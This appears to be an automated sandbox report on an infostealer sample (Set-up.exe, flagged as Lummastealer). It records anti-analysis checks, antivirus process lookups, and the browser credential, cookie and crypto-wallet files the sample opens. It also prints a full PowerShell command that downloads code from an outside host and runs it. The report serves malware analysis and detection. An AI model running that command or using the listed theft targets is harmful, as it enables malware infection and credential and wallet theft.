              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe, Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\Set-up.exe, WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\Set-up.exe, System information queried: FirmwareTableInformation
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe, API/Special instruction interceptor: Address: 6BAB7C44
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe, RDTSC instruction interceptor: First address: 6BABF3E1, second address: 6BABF3FD, instructions:
                0x00000000 rdtsc
                0x00000002 mov dword ptr [ebp-20h], eax
                0x00000005 mov dword ptr [ebp-1Ch], edx
                0x00000008 lea esi, dword ptr [ebp-38h]
                0x0000000b xor eax, eax
                0x0000000d xor ecx, ecx
                0x0000000f cpuid
                0x00000011 mov dword ptr [esi], eax
                0x00000013 mov dword ptr [esi+04h], ebx
                0x00000016 mov dword ptr [esi+08h], ecx
                0x00000019 mov dword ptr [esi+0Ch], edx
                0x0000001c rdtsc
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe, RDTSC instruction interceptor: First address: 6BABF3FD, second address: 6BABF3E1, instructions:
                0x00000000 rdtsc
                0x00000002 mov dword ptr [ebp-18h], eax
                0x00000005 mov dword ptr [ebp-14h], edx
                0x00000008 mov eax, dword ptr [ebp-18h]
                0x0000000b sub eax, dword ptr [ebp-20h]
                0x0000000e mov ecx, dword ptr [ebp-14h]
                0x00000011 sbb ecx, dword ptr [ebp-1Ch]
                0x00000014 add eax, dword ptr [ebp-10h]
                0x00000017 adc ecx, dword ptr [ebp-0Ch]
                0x0000001a mov dword ptr [ebp-10h], eax
                0x0000001d mov dword ptr [ebp-0Ch], ecx
                0x00000020 jmp 00007F2FF073B155h
                0x00000022 mov edx, dword ptr [ebp-04h]
                0x00000025 add edx, 01h
                0x00000028 mov dword ptr [ebp-04h], edx
                0x0000002b cmp dword ptr [ebp-04h], 64h
                0x0000002f jnl 00007F2FF073B1E0h
                0x00000031 rdtsc
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 5485
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Window / User API: threadDelayed 4291
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_isdecmp.dll
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_setup64.tmp
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_isdecmp.dll
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_setup64.tmp
              Source: C:\Users\user\Desktop\Set-up.exe, API coverage: 4.6 %
              Source: C:\Users\user\Desktop\Set-up.exe, TID: 5968, Thread sleep time: -180000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, TID: 2180, Thread sleep count: 5485 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, TID: 2180, Thread sleep count: 4291 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, TID: 1576, Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Users\user\Desktop\Set-up.exe, WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
              Source: C:\Users\user\Desktop\Set-up.exe, Code function: 0_2_0040A326 __EH_prolog, FindFirstFileA, FindFirstFileW, FindFirstFileW, FindFirstFileW
              Source: C:\Users\user\Desktop\Set-up.exe, Code function: 0_2_0040A911 __EH_prolog, FindFirstFileW, GetCurrentDirectoryW
              Source: C:\Users\user\Desktop\Set-up.exe, Code function: 0_2_0040B61F GetSystemInfo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\Set-up.exe, Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Set-up.exe, Code function: 0_2_004716D4 LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress
              Source: C:\Users\user\Desktop\Set-up.exe, Code function: 0_2_00680461 mov edx, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Set-up.exe, Code function: 0_2_00680A21 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Set-up.exe, Code function: 0_2_00680DD1 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Set-up.exe, Code function: 0_2_00681070 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\Set-up.exe, Code function: 0_2_00681071 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exe, Process token adjusted: Debug
              Source: C:\Users\user\Desktop\Set-up.exe, Code function: 0_2_0046E22A SetUnhandledExceptionFilter
              Source: C:\Users\user\Desktop\Set-up.exe, Code function: 0_2_0046E23C SetUnhandledExceptionFilter

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe, NtQuerySystemInformation: Direct from: 0x4585B0
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp Process created: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe "C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; 5x
              Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Queries volume information: C:\Users\user\AppData\Local\Temp\757b4941 VolumeInformation
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0040B820 GetSystemTime,SystemTimeToFileTime,0_2_0040B820
              Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0046D354 EntryPoint,GetVersion,GetCommandLineA,0_2_0046D354
              Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Set-up.exe, 00000000.00000003.2195047189.000000000077A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s%\Windows Defender\MsMpeng.exe
              Source: Set-up.exe, 00000000.00000003.2195047189.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2184587220.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2215607155.000000000077A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2184622292.0000000000779000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: find.exe, 0000001B.00000002.2738962581.000002ABDD7DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
              Source: C:\Users\user\Desktop\Set-up.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: Process Memory Space: Set-up.exe PID: 2164, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ets/Electrum-LTC
              Source: Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: llets/ElectronCash
              Source: Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: Set-up.exe, 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletkh<
              Source: Set-up.exe, 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: Set-up.exe, 00000000.00000003.2173940500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Set-up.exe, 00000000.00000003.2215482777.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
              Source: C:\Users\user\Desktop\Set-up.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST
              Source: Yara match File source: Process Memory Space: Set-up.exe PID: 2164, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match File source: Process Memory Space: Set-up.exe PID: 2164, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
              | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
              | Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 12 File and Directory Discovery | Remote Desktop Protocol | 41 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 11 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 226 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 521 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 221 Virtualization/Sandbox Evasion | Cached Domain Credentials | 221 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
              | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Process Injection | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
              | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
              | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 2 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
              [Behavior graph: ID 1582492, Sample: Set-up.exe, Start date: 30/12/2024, Architecture: WINDOWS, Score: 100]

              | Source | Detection | Scanner | Label | Link |
              | --- | --- | --- | --- | --- |
              | Set-up.exe | 5% | ReversingLabs | | |

              | Source | Detection | Scanner | Label | Link |
              | --- | --- | --- | --- | --- |
              | C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe | 39% | ReversingLabs | Win32.Spyware.Lummastealer | |
              | C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp | 0% | ReversingLabs | | |
